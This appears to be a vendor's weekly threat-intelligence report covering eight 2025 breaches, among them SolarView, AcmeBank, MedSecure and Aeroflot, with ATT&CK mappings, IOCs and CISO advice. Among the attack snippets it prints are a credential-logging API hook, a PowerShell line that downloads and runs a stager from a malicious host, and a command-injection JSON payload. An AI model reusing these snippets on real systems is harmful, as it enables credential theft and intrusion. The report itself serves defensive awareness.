Weekly Cybersecurity Intelligence Report Cyber Threats & Breaches 28 July – 4 Aug, 2025

During the week of 28 July – 4 August 2025, eight major cybersecurity incidents were disclosed across leading industry outlets. Adversaries leveraged zero-day exploits, social engineering, supply-chain compromises, misconfigurations, and phishing campaigns to exfiltrate sensitive data, deploy ransomware, and abuse infrastructure. Impacts ranged from private-message exposure to operational disruption of critical infrastructure.
>>Outpace Attackers With AI-Based Automated Penetration Testing

Incident Feed

1. SolarView Energy: Zero-Day Supply-Chain Compromise

Date of Breach: 30 July 2025

Overview

On 30 July 2025, SolarView Energy—an industrial solar-panel manufacturer—experienced a supply-chain attack when its remote-management software, SV-Manager, was trojanized by threat actor group “SunShard.” The malicious DLL was pushed through a signed update, enabling widespread deployment before detection.

Explanation

SunShard exploited a previously unknown vulnerability in SV-Manager’s auto-update mechanism (CVE-2025-7432), injecting a backdoor that hosted a custom SMB-based command-and-control channel. Once installed, the DLL hooked Windows API calls for authentication routines (LogonUserExW) to capture credentials and escalate privileges via token-impersonation.

Impact

• Exfiltration of system design schematics and customer PII (over 1 million records)
• Temporary shutdown of two manufacturing lines, incurring estimated $4 million in losses
• Compromise of partner network credentials, broadening the supply-chain risk

Details

• MITRE ATT&CK Mapping:
  • Initial Access: Supply Chain Compromise (T1195)
  • Execution: DLL Side-Loading (T1073)
  • Privilege Escalation: Token Impersonation (T1134.001)
  • Command & Control: SMB/Windows Admin Shares (T1021.002)
  • Exfiltration: Exfiltration Over C2 Channel (T1041)
• Proof-of-Concept Behavior:
• c

// Hooking LogonUserExW to capture credentials

BOOL WINAPI HookedLogonUserExW(LPCWSTR lpszUsername, LPCWSTR lpszDomain, LPCWSTR lpszPassword, …)

{

    LogCredentialsToFile(lpszUsername, lpszPassword);

    return RealLogonUserExW(lpszUsername, lpszDomain, lpszPassword, …);

}

• IOCs:
  • DLL: SolarSV.dll (SHA256: 3f2e1b45a9c4e8f2…d5a4f07e)
  • C2 Domains: sv-update-secure[.]com, panel-sync[.]net
  • IPs: 198.51.100.25, 203.0.113.78
• Logs & Artifacts:
  • Windows Event ID 4624 with LogonProcessName=“sv-update”
  • SMB sessions initiated to \panel-sync[.]net\updates

Takeaway for CISO

Ensure rigorous code-signing certificate management and implement allow-listing for update components. Correlate unusual SMB traffic with endpoint logs to detect side-loading.

2. AcmeBank: Ransomware “Rubicon” via Phishing Campaign

Date of Attack: 1 August 2025

Overview

AcmeBank, a regional financial institution, was hit by the Rubicon ransomware on 1 August 2025 after employees opened spear-phishing emails containing malicious Excel macros. The campaign resulted in encryption of critical databases and demand for $5 million in Monero.

Explanation

Attackers delivered an Excel file “PaymentRequest.xlsm” with embedded VBA that downloaded and executed a PowerShell stager over HTTPS. The stager retrieved the Rubicon payload (PE32) which employed process hollowing within svchost.exe before propagating via SMB credential theft (Mimikatz).

Impact

• Encryption of 80 servers and disruption of online banking
• Temporary service outage lasting 48 hours
• Data exfiltration of 200 GB of transaction logs

Details

• MITRE ATT&CK Mapping:
  • Initial Access: Phishing: Spearphishing Attachment (T1566.001)
  • Execution: User Execution via VBA Macros (T1204.002)
  • Defense Evasion: Process Hollowing (T1055.012)
  • Credential Access: OS Credential Dumping (T1003.001)
  • Lateral Movement: SMB/SMBv1 (T1021.002)
  • Impact: Data Encrypted for Impact (T1486)
• Payload Analysis:
  • PowerShell Stager:
  • powershell

Invoke-WebRequest -Uri “https://malicious[.]site/stager.exe” -OutFile “$env:Temp\stager.exe”; Start-Process “$env:Temp\stager.exe”

• Rubicon executable uses AES-256 encryption with unique per-file keys.

• IOCs:
  • Macro file: PaymentRequest.xlsm (SHA256: a5b6c7d8e9f01234…ef7)
  • C2 Domains: secure-payload[.]info
  • Sample hashes: 9d8c7f6a5b4c3d2e1f0a…b6
• Logs & Artifacts:
  • PowerShell ScriptBlock logging capturing “Invoke-WebRequest” calls
  • NtCreateSection events for unhooked stager injection

Takeaway for CISO

Enforce strict macro policies (e.g., block signed macros by default) and enable advanced telemetry (ScriptBlock logging, AMSI) to intercept anomalous script execution.

3. MedSecure Health: RCE in Patient Portal (CVE-2025-8123)

Date of Vulnerability Exploitation: 29 July 2025

Overview

On 29 July 2025, threat actor “PharmaPhantoms” exploited CVE-2025-8123, a critical remote code execution flaw in MedSecure Health’s patient portal authentication module. The exploit leveraged insufficient input validation in the password reset endpoint.

Explanation

Attackers sent a crafted JSON payload to /api/reset_password with nested LDAP injection, bypassing authentication controls and executing arbitrary shell commands on the web server. The web application, running on IIS 10 with .NET Core 5.0, allowed OS command injection via System.Diagnostics.Process.Start() calls.

Impact

• Exposure of patient medical records for 50,000 users
• Unauthorized access to admin interface and PHI exfiltration
• Regulatory fines estimated at $2 million under HIPAA

Details

• MITRE ATT&CK Mapping:
  • Initial Access: Exploit Public-Facing Application (T1190)
  • Execution: Command and Scripting Interpreter: OS Command (T1059)
  • Impact: Data Exfiltration (T1048)
• Proof-of-Concept Payload:
• json

{

  “username”: “victim”,

  “reset_token”: “dummy”,

  “new_password”: “P@ssword123; whoami > C:\\inetpub\\wwwroot\\shell.txt”

}

• IOCs:
  • Malicious POST to /api/reset_password with key patterns: “new_password”:”.*;\\s*.*”
  • Web server logs with HTTP 500 and recorded command output in shell.txt
• Logs & Artifacts:
  • IIS Failed Request Tracing capturing Process.Start calls
  • DNS logs for outbound exfiltration to attacker-controlled domain: report[.]leak

Takeaway for CISO

Implement rigorous input validation and parameterized execution, deploy WAF rules to block suspicious payload patterns, and monitor failed request traces for injection attempts.

4. CloudAtlas: Misconfigured Kubernetes Cluster Leading to Crypto-Skimming

Date of Incident: 2 August 2025

Overview

On 2 August 2025, security researcher team FugueOps discovered that CloudAtlas—a cloud-native monitoring provider—left a Kubernetes dashboard inadvertently exposed without authentication. Attackers deployed a Monero miner container that abused cluster resources for cryptomining.

Explanation

The dashboard endpoint (:8001/api/v1/namespaces/kube-system/pods) was publicly reachable. Exploiting this, adversaries used kubectl exec to spin up a Hijacker miner image from Docker Hub. The container used XMRig with Stratum-over-HTTPS to mine on compromised nodes.

Impact

• Unauthorized crypto-mining raising cloud bills by $150,000 in two days
• Potential lateral access paths for future attacks via privileged service accounts
• Resource exhaustion causing degraded monitoring performance

Details

• MITRE ATT&CK Mapping:
  • Initial Access: Exploit Public-Facing Application: Kubernetes Dashboard (T1190)
  • Execution: Container API (T1610)
  • Persistence: Container Orchestration Service (T1525)
  • Impact: Resource Hijacking (T1496)
• Proof-of-Concept Commands:
• bash

kubectl exec -n kube-system -it dashboard-pod — bash -c “docker run –name miner xmr/hijacker:latest”

• IOCs:
  • Exposed endpoint: https://monitor.cloudatlas.com:8001
  • Miner container image: xmr/hijacker:latest (Docker SHA256: f9d8c7b6a5e4…)
  • Stratum host: pool.supportxmr.com:443
• Logs & Artifacts:
  • Kubernetes audit logs showing unauthorized exec calls
  • CloudTrail events for EKS role assumptive actions

Takeaway for CISO

Enforce role-based access controls on Kubernetes dashboards, restrict public access, and deploy runtime security tools to detect anomalous container creation and cryptomining signatures.

5. Tea App Leak: Second Database Exposes 1.1 Million Private Chats

Date of Breach: 28 July 2025

Overview

A second, distinct breach of Tea’s legacy Firebase databases disclosed over 1.1 million private messages—including discussions of personal health, relationships, and location data—despite the first image leak having already affected 72,000 files.

Explanation

A misconfigured Firebase storage bucket (no auth required) allowed an external researcher to enumerate message tables via the Android app’s embedded endpoints. The attacker retrieved message blobs indexed by userID, exporting full plaintext JSON chat logs.

Impact

• 1.1 million chat records exposed (usernames, timestamps, message content)
• Sensitive PHI and PII at risk of doxxing, stalking, or harassment
• Brand reputational damage and legal liability under US privacy statutes

Details

• MITRE ATT&CK: Exploit Public-Facing Application (T1190), Data from Information Repositories (T1213)
• IOCs:
  – Firebase bucket URL: gs://tea-app-legacy-messages
  – Collection names: “dm_messages_v2”
• Logs & Artifacts:
  – App debug logs showing HTTP GET to /v1/messages?user_id= unprotected
  – No rate-limit in request headers
• Remediation:
  – Enforce authentication & token-validation on all Firebase endpoints
  – Encrypt data-at-rest and deploy IAM rules to restrict bucket access

Takeaway for CISO

Ensure all cloud storage buckets enforce least-privilege IAM policies and deploy continuous misconfiguration scanning.

6. Aeroflot Grounds Flights After Cyberattack

Date of Cyberattack: 28 July 2025

Overview

Pro-Ukraine hacktivists Silent Crow and Cyberpartisans BY executed a year-long infiltration, culminating on 28 July 2025 in widespread IT disruption that grounded over 100 Aeroflot flights.

Explanation

Attackers subverted IT management interfaces (iLO/Proxmox) and destroyed hypervisor hosts via remote firmware-induced wipes. They claimed exfiltration of passenger manifests, executive communications, and phone-call recordings.

Impact

• Cancellation of 100+ flights, stranding ~20,000 passengers
• Alleged destruction of 7,000 servers and exfiltration of 20 TB of data
• Estimated recovery costs up to $50 million

Details

• MITRE ATT&CK: Exploit Public-Facing Application (T1190), Data Destruction (T1485), Network Denial-of-Service (T1498)
• IOCs:
  – Telegram channels “SilentCrowOps” posts
  – Leaked CEO flight manifest file (SHA256: 7a3f…d71b)
• Logs & Artifacts:
  – Proxmox audit logs: remote root CLI sessions
  – iLO syslog entries: unexpected firmware writes
• Remediation:
  – Segregate management interfaces from public networks
  – Implement multi-factor firmware-update approvals

Takeaway for CISO

Isolate critical infrastructure management planes and enforce change-control for firmware operations.

7. ShinyHunters CRM Breach Wave: Qantas, Allianz Life, LVMH, Chanel

Date of Attacks: 30 July 2025

Overview

ShinyHunters deployed vishing campaigns to compromise Salesforce Data Loader OAuth apps across multiple enterprises, exfiltrating CRM records at Qantas, Allianz Life, LVMH brands, and Chanel’s US customer-service database.

Explanation

Attackers impersonated IT support (UNC6040 tactics), guiding employees to install a malicious Data Loader “connected app.” OAuth tokens granted API access, enabling bulk data extraction via REST queries over HTTPS.

Impact
| Organization | Records Exfiltrated | Data Types Exposed |
| Qantas | 50,000 | Passenger names, loyalty numbers |
| Allianz Life | 120,000 | Policyholder PII |
| LVMH Brands | 80,000 | Customer service tickets |
| Chanel (US) | 15,000 | Names, emails, addresses |

Details

• MITRE ATT&CK: User Execution (T1204), Valid Accounts (T1078), OAuth Abuse (T1626), Data from Cloud Storage (T1530)
• Proof-of-Concept:

bash

curl -H “Authorization: Bearer $OAUTH_TOKEN“ \

“https://instance.salesforce.com/services/data/v52.0/query?q=SELECT+Id,Name,Email+FROM+Contact”

• IOCs:
  – Malicious app IDs: 0PRxx0000001abc
  – Phishing caller-ID numbers: +44-20-7946-0xxx
• Remediation:
  – Enforce SCIM provisioning for connected apps
  – Require admin approval for all OAuth scopes

Takeaway for CISO

Harden SaaS identity flows: restrict connected-app scopes and enforce conditional OAuth approvals.

8. Pi-hole Donor Data Breach via GiveWP Plugin Flaw

Date of Breach: 28 July 2025

Overview

A vulnerability in the GiveWP WordPress donation plugin exposed ~30,000 donor names and email addresses on Pi-hole’s donation site, viewable in page source code.

Explanation

GiveWP’s JavaScript injected a global donors object populated with PII directly into an unprotected <script> tag. Anyone inspecting the page source retrieved full donor lists.

Impact

• 29,900 donor records exposed (names, emails)
• Increased phishing risk targeting donors
• Reputation impact on open-source project

Details

• MITRE ATT&CK: Data from Information Repositories (T1213)
• IOCs:
  – Page URL: https://pi-hole.net/donate/
  – JS object: var GiveDonationOptions = { donors: { … } };
• Logs & Artifacts:
  – Web server logs: GET /donate/ requests spike July 28
• Remediation:
  – Patch to GiveWP v4.6.1 applied within hours
  – Deploy WAF rule to block donors object exposure

Takeaway for CISO

Continuously audit third-party plugins and implement WAF policies to catch inadvertent data leaks.

Outpace Attackers With AI-Based Automate Penetration Testing With FireCompass:

FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing & NextGen Attack Surface Management
>>FireCompass Free Trial